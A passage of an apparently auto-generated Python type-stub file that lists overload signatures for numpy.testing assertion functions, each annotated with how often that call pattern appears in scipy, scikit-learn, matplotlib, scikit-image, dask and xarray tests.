x: Tuple[numpy.ndarray, numpy.ndarray], y: Tuple[List[float], List[int]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: Tuple[float, int], y: Tuple[float, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: bool):
"""
usage.matplotlib: 1
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: range):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.spatial.ckdtree._memoryviewslice, y: List[int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[list], y: List[list]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.matrix, y: bool):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[numpy.int64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[int], y: Tuple[int, int, int, int]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.bool_, y: bool, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: bool, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[int], y: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[float], y: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[Union[float, int]], y: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: List[numpy.int64], y: List[numpy.float64]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.SpearmanrResult, y: Tuple[float, float]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_equal(
x: scipy.stats.mstats_basic.SpearmanrResult, y: Tuple[float, float]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.KendalltauResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: scipy.stats._stats_mstats_common.LinregressResult,
y: Tuple[float, float, float, float, float],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.Ttest_1sampResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.Ttest_relResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.Ttest_indResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.SkewtestResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.KurtosistestResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(x: scipy.stats.stats.NormaltestResult, y: Tuple[float, float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.float64, numpy.float64], y: Tuple[numpy.float64, numpy.float64]
):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_equal(x: Tuple[numpy.float64, numpy.float64], y: Tuple[float, float]):
"""
usage.matplotlib: 2
"""
...
@overload
def assert_array_equal(x: List[int], y: range):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: float):
"""
usage.matplotlib: 4
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Literal["red"]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
y: numpy.ndarray,
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: List[int]):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: int):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: List[Union[float, int]]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Tuple[int, int, int, int]]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: List[Tuple[int, Union[float, int], int, int]]
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(
x: List[
Literal[
"2000-10-31T11:50:23",
"2054-06-20T14:31:45",
"1983-07-09T17:17:34",
"1976-03-05T00:00:01",
"2014-01-11T00:00:00",
]
],
y: List[
Literal[
"2000-10-31T11:50:23",
"2054-06-20T14:31:45",
"1983-07-09T17:17:34",
"1976-03-05T00:00:01",
"2014-01-11T00:00:00",
]
],
):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(x: List[numpy.ndarray], y: List[List[List[int]]]):
"""
usage.matplotlib: 5
"""
...
@overload
def assert_array_equal(x: List[List[numpy.ndarray]], y: List[List[List[int]]]):
"""
usage.matplotlib: 1
"""
...
@overload
def assert_array_equal(x: dask.dataframe.core.Index, y: List[int]):
"""
usage.dask: 2
"""
...
@overload
def assert_array_equal(x: list, y: numpy.ndarray):
"""
usage.sklearn: 4
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal[""]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: List[Literal["col_float", "col_int"]], y: List[Literal["col_float", "col_int"]]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["col_str"]], y: List[Literal["col_str"]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[Literal["col_float"]], y: List[Literal["col_float"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["col_int"]], y: List[Literal["col_int"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: List[Literal["col_str", "col_float"]], y: List[Literal["col_str", "col_float"]]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: List[Literal["col_str", "col_float", "col_int"]],
y: List[Literal["col_str", "col_float", "col_int"]],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: pandas.core.series.Series):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: int, err_msg: str):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: List[List[Literal["blue", "red", "green", "purple", "yellow"]]]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[numpy.ndarray], y: List[List[int]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[str]):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["1", "-1"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Union[int, Literal["foo"]]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[str], y: List[str]):
"""
usage.sklearn: 5
"""
...
@overload
def assert_array_equal(
x: List[Literal["e", "d", "c", "b", "a"]], y: List[Literal["e", "d", "c", "b", "a"]]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["I", "G", "E", "C", "A"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[bool], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[numpy.int64], y: List[int]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Union[int, float]], err_msg: str):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[numpy.ndarray], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: Tuple[int, int, int, int], y: Tuple[int, int, int, int]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["three", "two", "one"]]):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[List[List[int]]]):
"""
usage.sklearn: 9
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.float64, y: numpy.float64, err_msg: str):
"""
usage.sklearn: 7
"""
...
@overload
def assert_array_equal(x: numpy.int64, y: numpy.int64, err_msg: str):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(
x: Tuple[
Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
Tuple[numpy.float64, numpy.float64, numpy.float64, numpy.float64],
],
y: numpy.ndarray,
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: List[Literal["recall", "accuracy"]],
y: Tuple[Literal["accuracy"], Literal["recall"]],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ma.core.MaskedArray, y: List[Union[None, int]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ma.core.MaskedArray, y: numpy.ma.core.MaskedArray, err_msg: str
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: List[Dict[Literal["max_depth"], int]],
y: numpy.ndarray,
err_msg: Literal["Checking params"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: List[Dict[Literal["max_depth", "min_samples_split"], int]],
y: numpy.ndarray,
err_msg: Literal["Checking params"],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: Tuple[numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray, numpy.ndarray],
y: List[numpy.ndarray],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[numpy.ndarray], y: List[numpy.ndarray]):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(
x: List[Literal["א", "☮", "\x01F40D", "1"]],
y: List[Literal["א", "☮", "\x01F40D", "1"]],
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[str], y: numpy.ndarray):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[Literal["x0_dat2", "x0_c❤t1"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["n👍me_dat2", "n👍me_c❤t1"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["x2_b", "x0_c"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["x2_b", "x1_2", "x0_c"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Literal["x2_a", "x0_b"]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: List[Union[int, Literal["def"]]], y: List[Union[int, Literal["def"]]]
):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["pos"]]):
"""
usage.sklearn: 4
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["pos", "neg"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["neg", "pos"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["spam", "ham", "eggs", "0"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["0", "ham", "eggs", "spam"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Tuple[numpy.int64]], y: List[List[int]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["3", "2", "1"]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Literal["3", "2", "1"], ...]],
y: List[Tuple[Literal["3", "2", "1"], ...]],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["c", "b", "a"]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Literal["c", "b", "a"], ...]],
y: List[Tuple[Literal["c", "b", "a"], ...]],
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(
x: List[Tuple[Tuple[int], ...]], y: List[Tuple[Tuple[int], ...]]
):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Tuple[List[int], List[int]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: Tuple[float, float, float]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["solver svd"]
):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["solver lsqr"]
):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(
x: numpy.ndarray, y: numpy.ndarray, err_msg: Literal["solver eigen"]
):
"""
usage.sklearn: 3
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["paris"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: List[Union[float, int]], y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.str_, y: List[Literal["eggs"]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[list], y: numpy.ndarray):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[int], err_msg: str):
"""
usage.sklearn: 5
"""
...
@overload
def assert_array_equal(x: numpy.flatiter, y: List[float]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.flatiter, y: List[Union[float, int]]):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: int, y: numpy.ndarray):
"""
usage.sklearn: 4
"""
...
@overload
def assert_array_equal(x: numpy.float32, y: numpy.float32):
"""
usage.sklearn: 2
"""
...
@overload
def assert_array_equal(x: List[slice[int, int, int]], y: List[slice[int, int, int]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.ndarray, y: List[Literal["a", "b", "c"]]):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: sklearn.utils._mocking.MockDataFrame, y: numpy.ndarray):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(x: numpy.memmap, y: numpy.memmap):
"""
usage.sklearn: 1
"""
...
@overload
def assert_array_equal(
x: pandas.core.series.Series,
y: Tuple[Type[numpy.float16], Type[numpy.float32], Type[numpy.float32]],
):
"""
usage.sklearn: 1
"""
...
def assert_array_equal(x: object, y: object, err_msg: str = ...):
"""
usage.dask: 36
usage.matplotlib: 186
usage.scipy: 1623
usage.skimage: 430
usage.sklearn: 1475
usage.xarray: 400
"""
...
@overload
def assert_array_less(x: numpy.float64, y: numpy.float64):
"""
usage.scipy: 2
usage.skimage: 16
usage.sklearn: 1
"""
...
@overload
def assert_array_less(x: numpy.ndarray, y: numpy.ndarray):
"""
usage.scipy: 4
usage.skimage: 2
usage.sklearn: 4
"""
...
@overload
def assert_array_less(x: numpy.float64, y: float):
"""
usage.scipy: 3
usage.skimage: 2
usage.sklearn: 1
"""
...
@overload
def assert_array_less(x: numpy.float128, y: numpy.float128, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_less(x: numpy.float64, y: numpy.float64, err_msg: str):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_less(x: numpy.float32, y: numpy.float64, err_msg: str):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_less(x: float, y: float):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_less(x: int, y: numpy.float64):
"""
usage.scipy: 1
usage.sklearn: 1
"""
...
@overload
def assert_array_less(x: float, y: numpy.float64):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_less(x: numpy.ndarray, y: float):
"""
usage.scipy: 33
usage.sklearn: 3
"""
...
@overload
def assert_array_less(x: numpy.ndarray, y: int):
"""
usage.scipy: 8
usage.sklearn: 1
"""
...
@overload
def assert_array_less(x: int, y: numpy.ndarray):
"""
usage.scipy: 4
usage.sklearn: 1
"""
...
@overload
def assert_array_less(x: float, y: numpy.ndarray):
"""
usage.scipy: 20
usage.sklearn: 3
"""
...
@overload
def assert_array_less(x: numpy.ndarray, y: numpy.ndarray, err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_less(x: numpy.ndarray, y: numpy.float64):
"""
usage.scipy: 1
"""
...
@overload
def assert_array_less(x: numpy.float64, y: numpy.ndarray):
"""
usage.scipy: 3
"""
...
@overload
def assert_array_less(x: List[float], y: List[numpy.float64]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_less(x: List[int], y: List[int]):
"""
usage.scipy: 2
"""
...
@overload
def assert_array_less(x: numpy.ma.core.MaskedArray, y: float):
"""
usage.matplotlib: 3
"""
...
@overload
def assert_array_less(x: numpy.float64, y: int, err_msg: str):
"""
usage.sklearn: 3
"""
...
def assert_array_less(x: object, y: object, err_msg: str = ...):
"""
usage.matplotlib: 3
usage.scipy: 92
usage.skimage: 20
usage.sklearn: 18
"""
...
@overload
def assert_equal(actual: numpy.float64, desired: float):
"""
usage.scipy: 318
usage.skimage: 10
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: int, desired: int):
"""
usage.scipy: 534
usage.skimage: 68
"""
...
@overload
def assert_equal(actual: numpy.float64, desired: numpy.float64):
"""
usage.scipy: 112
usage.skimage: 7
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: int):
"""
usage.scipy: 67
usage.skimage: 19
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: str, desired: str):
"""
usage.scipy: 27
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.ndarray):
"""
usage.dask: 7
usage.matplotlib: 3
usage.scipy: 538
usage.skimage: 241
usage.sklearn: 2
usage.xarray: 3
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int], desired: Tuple[int, int, int]):
"""
usage.scipy: 40
usage.skimage: 20
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: numpy.dtype):
"""
usage.scipy: 336
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[int]):
"""
usage.dask: 2
usage.scipy: 107
usage.skimage: 21
"""
...
@overload
def assert_equal(actual: numpy.float64, desired: int):
"""
usage.scipy: 136
usage.skimage: 27
"""
...
@overload
def assert_equal(actual: numpy.uint8, desired: int):
"""
usage.skimage: 9
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: float):
"""
usage.scipy: 50
usage.skimage: 3
usage.xarray: 2
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int], desired: Tuple[int, int, int, int]):
"""
usage.scipy: 14
usage.skimage: 7
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int, int], desired: Tuple[int, int, int, int, int]
):
"""
usage.scipy: 14
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[numpy.ndarray, numpy.ndarray], desired: List[List[int]]):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray], desired: List[List[Union[float, int]]]
):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int], desired: Tuple[int]):
"""
usage.scipy: 61
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[List[int]]):
"""
usage.scipy: 41
usage.skimage: 8
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Tuple[int, int]):
"""
usage.scipy: 2
usage.skimage: 2
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.int64, numpy.int64, numpy.int64], desired: Tuple[int, int, int]
):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: Tuple[numpy.int64, numpy.int64], desired: Tuple[int, int]):
"""
usage.scipy: 17
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int], desired: Tuple[int, int]):
"""
usage.scipy: 179
usage.skimage: 40
"""
...
@overload
def assert_equal(actual: None, desired: None):
"""
usage.scipy: 3
usage.skimage: 6
"""
...
@overload
def assert_equal(
actual: List[Union[Literal["a", "z"], int]],
desired: List[Union[Literal["a", "z"], int]],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: List[str], desired: List[str]):
"""
usage.scipy: 1
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Type[numpy.ndarray], desired: Type[numpy.ndarray]):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Literal["pil"], desired: Literal["pil"]):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Literal["matplotlib"], desired: Literal["matplotlib"]):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: int, desired: numpy.ndarray):
"""
usage.scipy: 6
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: int):
"""
usage.scipy: 30
usage.skimage: 56
usage.xarray: 2
"""
...
@overload
def assert_equal(actual: float, desired: float):
"""
usage.scipy: 125
usage.skimage: 2
"""
...
@overload
def assert_equal(
actual: Tuple[slice[int, int, int], slice[int, int, int]],
desired: Tuple[slice[int, int, int], slice[int, int, int]],
):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.int64):
"""
usage.scipy: 24
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: List[numpy.float64], desired: List[numpy.float64]):
"""
usage.matplotlib: 1
usage.skimage: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.float64, numpy.float64],
desired: Tuple[numpy.float64, numpy.float64],
):
"""
usage.scipy: 1
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: bool, desired: bool, err_msg: str):
"""
usage.scipy: 1
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[bool]):
"""
usage.scipy: 6
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.uint8]):
"""
usage.scipy: 11
usage.skimage: 5
"""
...
@overload
def assert_equal(actual: numpy.uint8, desired: numpy.uint8):
"""
usage.scipy: 3
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: numpy.int64, desired: numpy.ndarray):
"""
usage.skimage: 3
"""
...
@overload
def assert_equal(actual: numpy.uint64, desired: numpy.uint64):
"""
usage.scipy: 3
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: numpy.uint64, desired: numpy.ndarray):
"""
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.uint8, desired: numpy.ndarray):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: Tuple[int], desired: numpy.ndarray):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int], desired: numpy.ndarray):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int], desired: numpy.ndarray):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int], desired: numpy.ndarray):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: Tuple[int, int, int, int, int], desired: numpy.ndarray):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: numpy.int16, desired: int):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.float32, desired: int):
"""
usage.scipy: 6
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.float32, desired: float):
"""
usage.scipy: 5
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.uint16, desired: int):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.uint32, desired: int):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.int32, desired: int):
"""
usage.scipy: 15
usage.skimage: 2
"""
...
@overload
def assert_equal(actual: numpy.int8, desired: int):
"""
usage.scipy: 5
usage.skimage: 2
"""
...
@overload
def assert_equal(
actual: Tuple[slice[None, None, None], slice[None, None, None]],
desired: List[slice[None, None, None]],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: int, desired: numpy.float64):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(
actual: Tuple[
slice[numpy.int64, None, numpy.int64], slice[numpy.int64, None, numpy.int64]
],
desired: List[slice[float, None, float]],
):
"""
usage.skimage: 2
"""
...
@overload
def assert_equal(
actual: Tuple[
slice[numpy.int64, None, numpy.int64],
slice[numpy.int64, None, numpy.int64],
slice[numpy.int64, None, numpy.int64],
],
desired: List[slice[float, None, float]],
):
"""
usage.skimage: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int, int, int],
desired: Tuple[int, int, int, int, int, int],
):
"""
usage.scipy: 5
usage.skimage: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[List[List[List[int]]]]):
"""
usage.skimage: 4
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[cftime._cftime.DatetimeNoLeap]):
"""
usage.xarray: 3
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: list):
"""
usage.scipy: 7
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[cftime._cftime.Datetime360Day]):
"""
usage.xarray: 3
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[cftime._cftime.DatetimeJulian]):
"""
usage.xarray: 3
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: List[cftime._cftime.DatetimeAllLeap]):
"""
usage.xarray: 3
"""
...
@overload
def assert_equal(
actual: numpy.ndarray, desired: List[cftime._cftime.DatetimeGregorian]
):
"""
usage.xarray: 3
"""
...
@overload
def assert_equal(
actual: numpy.ndarray, desired: List[cftime._cftime.DatetimeProlepticGregorian]
):
"""
usage.xarray: 2
"""
...
@overload
def assert_equal(actual: xarray.core.dataarray.DataArray, desired: numpy.ndarray):
"""
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.int32, desired: numpy.int32):
"""
usage.scipy: 5
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.int32):
"""
usage.scipy: 1
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.float32, desired: numpy.float32):
"""
usage.scipy: 5
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: numpy.float32):
"""
usage.scipy: 1
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: object, desired: object):
"""
usage.scipy: 1
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: object):
"""
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.str_, desired: Literal["foo"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.ndarray, desired: Literal["foo"]):
"""
usage.xarray: 1
"""
...
@overload
def assert_equal(actual: numpy.datetime64, desired: numpy.datetime64):
"""
usage.xarray: 2
"""
...
@overload
def assert_equal(actual: numpy.timedelta64, desired: numpy.timedelta64):
"""
usage.xarray: 2
"""
...
@overload
def assert_equal(actual: bool, desired: bool):
"""
usage.scipy: 104
"""
...
@overload
def assert_equal(actual: Literal["another name"], desired: Literal["another name"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: Tuple[int], desired: Tuple[int], err_msg: str):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[int, int, int, int], desired: Tuple[int, int, int, int], err_msg: str
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: numpy.dtype, desired: Type[numpy.float64]):
"""
usage.scipy: 35
"""
...
@overload
def assert_equal(
actual: Type[numpy.random.mtrand.RandomState],
desired: Type[numpy.random.mtrand.RandomState],
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(
actual: Type[numpy.random._generator.Generator],
desired: Type[numpy.random._generator.Generator],
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: scipy._lib._util.FullArgSpec, desired: scipy._lib._util.FullArgSpec
):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: List[numpy.float64], desired: numpy.ndarray):
"""
usage.scipy: 3
"""
...
@overload
def assert_equal(actual: Literal["bad signature"], desired: Literal["bad signature"]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(actual: float, desired: int):
"""
usage.scipy: 29
"""
...
@overload
def assert_equal(actual: List[float], desired: List[float]):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: Tuple[numpy.ndarray, numpy.ndarray],
desired: Tuple[numpy.ndarray, numpy.ndarray],
):
"""
usage.scipy: 11
"""
...
@overload
def assert_equal(actual: List[int], desired: numpy.ndarray):
"""
usage.scipy: 13
"""
...
@overload
def assert_equal(actual: List[int], desired: List[int]):
"""
usage.scipy: 15
"""
...
@overload
def assert_equal(actual: numpy.bool_, desired: bool):
"""
usage.scipy: 19
"""
...
@overload
def assert_equal(
actual: List[Literal["g", "m", "c"]], desired: List[Literal["g", "m", "c"]]
):
"""
usage.scipy: 1
"""
...
@overload
def assert_equal(
actual: List[Literal["weak mixing angle"]],
